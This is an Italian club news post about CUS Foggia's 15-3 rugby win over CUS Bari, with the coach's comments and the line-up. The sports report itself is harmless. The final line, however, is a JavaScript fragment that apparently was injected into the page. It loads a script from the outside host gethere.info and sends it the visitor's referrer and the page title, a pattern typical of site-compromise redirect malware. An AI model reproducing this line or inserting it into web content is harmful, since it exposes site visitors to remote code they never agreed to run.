.
News
  • Home

Tre mete per sfatare il tabù Bari!

di trarre 0
14 Mar 2016

Quella di ieri è stata l’ultima partita casalinga della stagione per la formazione Senior di mister Alberto Follo, impegnata nel duro match contro il Tigri Bari.

Nonostante un campo reso molto pesante dalla pioggia, i rossoneri sono riusciti a mettere in mostra un ottimo impianto di gioco, costringendo gli avversari a restare in trincea per buona parte della partita, ottenendo alla fine una bella vittoria per 15-3, con due mete segnate da Mattia Cordiano e una da Antonio Russo. Un successo che spezza il digiuno di vittorie contro la formazione barese e che ha riempito di soddisfazione e orgoglio l’intero ambiente cussino.

Abbiamo giocato molto bene, imponendo il nostro gioco contro un avversario molto ostico. Abbiamo solo il rammarico di non aver segnato la quarta meta che ci avrebbe consentito di prendere i 5 punti” ha commentato Follo a fine partita, particolarmente colpito anche dalla direzione arbitrale.

“Voglio fare i miei complimenti al signor Frontini per come è riuscito a dirigere, gestire e disciplinare una partita resa ancora più complicata dal campo appesantito dalla pioggia caduta prima e durante il match”. 

La Senior giocherà a Taranto, l’ultima gara stagionale, il prossimo 10 aprile.

CUS FOGGIA – CUS BARI 15-3

Cus Foggia: Cordiano, Ricucci, Lupoli, Baiardi E., Bentivogli, Direse, D’Addario, Cioccio, Cassinese, Severino, Corvino, De Santis, Ricciardi, Montano, Russo.

A disposizione: Baiardi C., Marangelli, MArtiradonna, Sciarappa, Lippa, Scarlato.

Allenatore: Alberto Follo.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;